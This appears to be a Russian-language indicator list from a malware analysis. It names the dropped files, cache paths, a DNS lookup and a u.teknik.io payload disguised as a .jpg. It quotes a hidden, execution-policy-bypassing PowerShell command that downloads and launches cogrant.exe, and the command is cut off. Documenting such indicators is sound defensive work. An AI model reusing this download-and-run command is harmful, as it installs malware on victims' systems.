Техническая информация
- '%APPDATA%\cogrant.exe'
- https://u.teknik.io/9pnzw.jpg как %appdata%\cogrant.exe
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- %APPDATA%\cogrant.exe
- %TEMP%\addinprocess32.exe
- http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
- DNS ASK u.##knik.io
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://u.teknik.io/9Pnzw.jpg','%APPDATA%\COGRANT.exe');Start-Process '%APPDA...' (со скрытым окном)